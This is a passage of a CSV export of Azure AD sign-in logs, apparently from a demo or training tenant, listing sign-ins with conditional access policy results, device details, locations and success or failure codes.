'83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",c0ce23b7-81fe-4875-94a5-4bf3ec5d1a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c0ce23b7-81fe-4875-94a5-4bf3ec5d1a00,SigninLogs,Sucess,36.6404686,-78.26995087
+381,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:44.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:27,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",cb4c73c8-c2d6-48cb-8957-023b7af25400,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,cb4c73c8-c2d6-48cb-8957-023b7af25400,SigninLogs,Sucess,32.32146072,34.85319901
+382,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:33.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50126,None,Invalid username or password or Invalid on-premise username or password.,0,fb4a9b3e-f556-431c-9d15-aa35c40c89df,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,[],notApplied,09/04/2020 14:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'IE 7.0'}",6ab139a2-776a-491f-a231-a575d79f1800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],"{'errorCode': 50126, 'failureReason': 'Invalid username or password or Invalid on-premise username or password.'}",CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6ab139a2-776a-491f-a231-a575d79f1800,SigninLogs,Failed,35.01296997,-80.93171692
+383,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,18:26.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,[],notApplied,09/04/2020 15:18,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",4dc8a716-884f-40b4-8694-265efb885a00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",95289cbf-4ab6-46f3-804b-c9a6f2ef1227,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,4dc8a716-884f-40b4-8694-265efb885a00,SigninLogs,Failed,32.32146072,34.85319901
+384,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,26:05.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,549b402c-ba63-4266-b599-2baf7b0cc54b,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:26,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",0a70c0cd-a111-442a-87bb-4de8140a1b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,0a70c0cd-a111-442a-87bb-4de8140a1b00,SigninLogs,Sucess,33.7984581,-84.38828278
+385,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:51.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b2831697-435a-470d-83f3-8fe628015eb0,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 15:13,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",427050f6-7c42-4813-a7f4-3e3b3cc05600,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,427050f6-7c42-4813-a7f4-3e3b3cc05600,SigninLogs,Sucess,32.32146072,34.85319901
+386,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:50.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c23e9762-ecae-4491-948b-01668c6ecfc2,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:02,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'IE 7.0'}",f1960fd9-1bc9-46c5-8a44-ddea9c421800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,f1960fd9-1bc9-46c5-8a44-ddea9c421800,SigninLogs,Sucess,35.01296997,-80.93171692
+387,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,18:33.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:18,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",3e761143-ab1f-4619-9ebd-16e243093c00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,3e761143-ab1f-4619-9ebd-16e243093c00,SigninLogs,Sucess,32.32146072,34.85319901
+388,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:20.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,90072,None,Other,0,0ba2ceb9-9617-4775-98e0-ec9cc7f7aa90,Microsoft.aadiam,Microsoft.aadiam,,CTFUser2,4,US,MSX Insights Production,75c6cfc8-e031-40aa-8392-e9f0463abbbd,,[],notApplied,09/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 18.18363'}",3cf5caa0-eacb-4cee-a6ac-5420d5521900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.1869888305664, 'latitude': 47.68061828613281}, 'state': 'Washington', 'city': 'Kirkland'}",none,none,none,none,[],"{'errorCode': 90072, 'failureReason': 'Other'}",CTFUser2,d6166cfc-e0a3-43ce-bc64-761185c4082f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3cf5caa0-eacb-4cee-a6ac-5420d5521900,SigninLogs,Failed,47.68061829,-122.1869888
+389,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:30.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1f87c343-92d9-421f-9bde-551e2669a182,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",17ea6265-ad23-4765-8c42-0b9ff61f1a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,17ea6265-ad23-4765-8c42-0b9ff61f1a00,SigninLogs,Sucess,36.6404686,-78.26995087
+390,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,04:10.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,dc84c161-1afe-4498-949f-8b60ebb58cfe,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 